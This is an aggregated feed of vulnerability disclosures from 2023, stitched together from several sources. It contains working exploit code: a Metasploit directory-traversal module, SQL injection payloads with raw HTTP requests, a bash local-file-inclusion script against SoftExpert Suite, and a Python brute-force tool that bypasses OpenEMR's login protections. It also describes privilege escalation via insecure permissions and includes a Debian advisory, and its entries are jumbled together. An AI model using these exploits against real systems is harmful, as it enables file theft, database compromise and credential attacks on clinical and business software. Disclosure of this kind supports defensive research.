GV-Edge Recording Manager version 2.2.3.0 suffers from a privilege escalation vulnerability.

    # Exploit Title: GV-Edge Recording Manager 2.2.3.0 - Privilege Escalation due Incorrect Default Permissions# Date: 2023-05-04# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.geovision.com.tw - https://gvision.it# Software Link: https://dlcdn.geovision.com.tw/Software/DVD/Paid/GV-EdgeRecordingManager.zip# Version: 2.2.3.0 / Installer version: 12.0.0.49974# Tested on: Windows 10 Pro 22H2 x64# CVE: CVE-2023-23059 / Vendor Advisory ID: GV-ERM-2023-05 / Article ID: GV4-23-05-03An issue was discovered in GeoVision GV-Edge Recording Manager 2.2.3.0 for Windows (Installer version: 12.0.0.49974),which contains improper permissions within the default installation and allows attackers to execute arbitrary code andgain escalated privileges.Vendor security advisory: Security_Advistory_ERM-2023-05.pdfTimeline:2023-01-02: Vulnerability discovered, vendor contacted2023-01-03: Vendor replies, request for CVE reservation, acknowledgments and coordinating for advisory,2023-01-04: Vendor assigned case S-202301030001, request for internal support and fix,2023-04-25: Assigned CVE number: CVE-2023-23059, notified Vendor for coordinated disclosure,2023-05-03: Vendor Security Advisory publication on https://www.geovision.com.tw/cyber_security.php2023-05-04: CVE publication / disclosure.

GV-Edge Recording Manager 2.2.3.0 Privilege Escalation

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Carlo Gavazzi Powersoft up to version 2.1.1.1 allows an unauthenticated, remote attacker to download any file from the affected device.

    require 'msf/core'
    
    class MetasploitModule < Msf::Auxiliary
    	Rank = GreatRanking
    
    	include Msf::Exploit::Remote::HttpClient
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name'           => 'Carlo Gavazzi Powersoft Directory Traversal',
    			'Description'    => %q{
    				This module exploits a directory traversal vulnerability
    				found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
    				is triggered when sending a specially crafted GET request to the
    				server. The location parameter of the GET request is not sanitized
    				and the sendCommand.php script will automatically pull down any
    				file requested
    			},
    			'Author'         => [ 'james fitts' ],
    			'License'        => MSF_LICENSE,
    			'References'     =>
    				[
    					[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
    				],
    			'DisclosureDate' => 'Jan 21 2015'))
    
    		register_options(
    			[
    				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
    				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
    				OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
    				OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
    				Opt::RPORT(80)
    			], self.class )
    	end
    
    	def run
    
    	require 'base64'
    
    	credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    
    	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
    	levels = "/" + ("../" * depth)
    
    	res = send_request_raw({
    		'method'	=> 'GET',
    		'uri'		=> "#{levels}#{datastore['FILE']}?res=&valid=true",
    		'headers'	=>	{
    			'Authorization'	=>	"Basic #{credentials}"
    		},
    	})
    
    	if res and res.code == 200
    		loot = res.body
    		if not loot or loot.empty?
    			print_status("File from #{rhost}:#{rport} is empty...")
    			return
    		end
    		file = ::File.basename(datastore['FILE'])
    		path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
    		print_status("Stored #{datastore['FILE']} to #{path}")
    		return
    	end
    
    	end
    end

CVE-2017-20184: OffSec’s Exploit Database Archive

Judging Management System v1.0 by oretnom23 was discovered to vulnerable to SQL injection via /php-jms/review_result.php?mainevent_id=, mainevent_id.

**Judging Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+// Leak place ---> mainevent\_id

​sql GET /php-jms/review_result.php?mainevent_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1 Connection: close ​

CVE-2023-30077: cve_report/SQLi-1.md at main · Dzero57/cve_report

An issue was discovered in Genomedics MilleGP5 5.9.2, allows remote attackers to execute arbitrary code and gain escalated privileges via modifying specific files.

    # Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control# Date: 2023-04-28# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://millegpg.it/# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe# Version: 5.9.2# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913# CVE: CVE-2023-25438MilleGPG / MilleGPG5 also known as "Governo Clinico 3"Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.Affected/tested version: MilleGPG5 5.9.2Summary:Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through theItalian general practice network.MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for theGeneral Practitioner, also offering contextual access to the most authoritative scientific content and CME training.Vuln desc:The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing somefiles to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weaknessabusing the "write" permission of the main application available to all users on the system or network.Details:Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:C:\Program Files\MilleGPG5\MilleGPG5.exe    (main gui application)C:\Program Files\MilleGPG5\plugin\          (GPGCommand.exe, nginx and php files)C:\Program Files\MilleGPG5\k-platform\      (api and webapp files)such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA

CVE-2023-25438: MilleGPG5 5.9.2 Local Privilege Escalation ≈ Packet Storm

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the judge_id parameter at /php-jms/edit_judge.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: whoamikey

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=

Vulnerability location: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=, judge\_id

dbname =jms\_db

\[+\] Payload: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=-1%27%20union%20select%201,2,database(),4,5,6--+ // Leak place ---> judge\_id

GET /php\-jms/edit\_judge.php?sub\_event\_id\=&se\_name\=&judge\_id\=\-1%27%20union%20select%201,2,database(),4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: closes

CVE-2023-30204: bug_report/SQLi-3.md at main · debug601/bug_report

A stored cross-site scripting (XSS) vulnerability in DouPHP v1.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the unique_id parameter in /admin/article.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-30205: DouPHP-xss · Issue #2 · succc3/cve

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \    "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

SoftExpert Suite 2.1.3 Local File Inclusion

OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass

Debian Linux Security Advisory 5396-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. Luan Herrera discovered that an HTML document may be able to render iframes with sensitive user information. P1umer and Q1IQ discovered that processing maliciously crafted web content may lead to arbitrary code execution. An anonymous researcher discovered that processing maliciously crafted web content may bypass Same Origin Policy. Clement Lecigne and Donncha O Cearbhaill discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 03, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2022-0108 CVE-2022-32885 CVE-2023-27932 CVE-2023-27954  
                 CVE-2023-28205

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2022-0108

    Luan Herrera discovered that an HTML document may be able to  
    render iframes with sensitive user information.

CVE-2022-32885

    P1umer and Q1IQ discovered that processing maliciously crafted web  
    content may lead to arbitrary code execution.

CVE-2023-27932

    An anonymous researcher discovered that processing maliciously  
    crafted web content may bypass Same Origin Policy.

CVE-2023-27954

    An anonymous researcher discovered that a website may be able to  
    track sensitive user information.

CVE-2023-28205

    Clement Lecigne and Donncha O Cearbhaill discovered that  
    processing maliciously crafted web content may lead to arbitrary  
    code execution. Apple is aware of a report that this issue may  
    have been actively exploited.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.40.1-1~deb11u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRSI5kACgkQAAyEYu0C  
2AJ8pxAAhwQbCnrdpJ7dl7gU1Yz/nkz1e3Nb9T5u5J32v85uqXj5KPRrtGFTi+uG  
dObt0lPep1Sn07G4wR2WU9SSc8/OPWpEmil0ULHof+YUDA0JVAi0fPT+EL8MFZpa  
H7xKUYYdyVh12wN56yEB7zz698SdrrB32XKfrcQZk5SlbNYaFAGzKhfkhWn/sDmo  
c9XgjH8WULLDpjeU9qRNFmMfw16WWzxuX6JPhyLFxKoT513y1ojEU/zBEqPb/J44  
gD60Kv8qBdgvYzP2VIWm7zX0O3fp5mrkxaBPhpwfaFdG3dBUHm6MzFY/PX5uMXjE  
ZkSUmlTW/pf4pfVkT0w+coDc4kT03QDLIZiY2Z1tn6HHNxNJRcpDq074l+NGIWfb  
SNoJJjbB+t0FAyCvlRuKrd09bsYDexuf/T61dTiWGp5t1AHs3ylBZ7raSCh58iN1  
u0H77NOLXjmNzbNYCCvPHKJukn38GmOTve4ZpFiZqym5X3bZ0/Xv33isnBxqLHoc  
8XJHL57qxIW7ls+yY5rqAUWeRzePZTd1lq3CEWKA/8wUxlEdFKZO2eHtdCykasR3  
8vNyMH77LjGaNdc9pORJv/UVLUcZ8qEeuNKyFYeuhuok6lY5EQBGwAeVVyJNj0Py  
0GufP85ZEdeBL9eKRSBeVJDClm111vJDhtAc57SyTgVSS/5jUoY=  
=xARY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5396-1

PHPJabbers Simple CMS version 5.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

Tag

#php